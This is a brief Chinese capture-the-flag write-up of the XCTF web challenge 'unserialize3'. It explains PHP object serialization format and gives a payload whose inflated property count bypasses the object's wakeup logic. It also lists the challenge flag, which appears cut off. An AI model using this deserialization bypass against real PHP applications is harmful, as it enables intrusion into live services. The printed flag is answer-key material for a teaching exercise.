攻防世界(进阶)--WEB--5.unserialize3

考察点：反序列化

1.进入场景，代码审计

xctf类中变量flag值为111，序列化后为 O:4:"xctf":1:{s:4:"flag";s:3:"111";}

（public属性序列化后格式为：数据类型:属性名长度:"属性名";数据类型:属性值长度:"属性值"）

2.将设置属性值为2，可导致反序列化异常：O:4:"xctf":2:{s:4:"flag";s:3:"111";}

提交参数，得到flag： cyberpeace{62b5aa0946978b972148ced63016350b